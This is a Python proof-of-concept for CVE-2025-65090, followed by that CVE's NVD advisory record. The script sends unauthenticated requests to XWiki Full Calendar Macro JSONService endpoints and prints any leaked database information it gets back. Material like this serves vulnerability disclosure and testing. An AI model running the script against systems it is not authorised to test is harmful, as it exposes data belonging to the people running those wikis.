CVE-2025-65090

import requests # CVE-2025-65090 PoC - XWiki Full Calendar Macro Information Disclosure # Target: XWiki instance with Full Calendar Macro < 2.4.6 # Author: Security Research def exploit_cve_2025_65090(target_url): """ Exploit for CVE-2025-65090 - XWiki Full Calendar Macro JSONService Information Disclosure This PoC demonstrates how an unauthenticated user can access sensitive data through Calendar.JSONService """ # Target endpoint that exposes database information endpoints = [ "/xwiki/bin/view/Main/Calendar.JSONService", "/xwiki/bin/view/XWiki/Calendar.JSONService", "/Calendar.JSONService" ] print("[*] CVE-2025-65090 - XWiki Full Calendar Macro Information Disclosure") print(f"[*] Target: {target_url}") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"\n[*] Testing endpoint: {url}") try: # Send GET request without authentication # The vulnerability allows unauthenticated access to database info response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[!] Potential vulnerability detected!") print(f"[!] Status Code: {response.status_code}") print(f"[!] Response Length: {len(response.text)} bytes") # Check if response contains sensitive data if 'xwiki' in response.text.lower() or 'class' in response.text.lower(): print("[!] Response contains potential database information") print("[*] Sample response (first 500 chars):") print(response.text[:500]) return True else: print(f"[*] Status Code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False if __name__ == "__main__": # Example usage target = "http://target-xwiki-instance.com" exploit_cve_2025_65090(target)

{"cve": {"id": "CVE-2025-65090", "sourceIdentifier": "[email protected]", "published": "2026-01-10T04:16:01.013", "lastModified": "2026-01-29T17:27:42.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XWiki Full Calendar Macro displays objects from the wiki on the calendar. Prior to version 2.4.6, users with the rights to view the Calendar.JSONService page (including guest users) can exploit the data leak vulnerability by accessing database info, with the exception of passwords. This issue has been patched in version 2.4.6."}, {"lang": "es", "value": "El Macro XWiki Full Calendar muestra objetos de la wiki en el calendario. Antes de la versión 2.4.6, los usuarios con derechos para ver la página Calendar.JSONService (incluidos los usuarios invitados) pueden explotar la vulnerabilidad de fuga de datos al acceder a información de la base de datos, con la excepción de las contraseñas. Este problema ha sido parcheado en la versión 2.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:full_calendar_macro:*:*:*:*:*:xwiki:*:*", "versionEndExcluding": "2.4.6", "matchCriteriaId": "593D6873-0334-4275-922F-82A16C720D5D"}]}]}], "references": [{"url": "https://github.com/xwiki-contrib/macro-fullcalendar/commit/25bc14c181c9a92f493b20ac264388c7ba171884", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/xwiki-contrib/macro-fullcalendar/security/advisories/GHSA-637h-ch24-xp9m", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://jira.xwiki.org/browse/FULLCAL-82", "source": "[email protected]", "tags": ["Permissions Required"]}]}}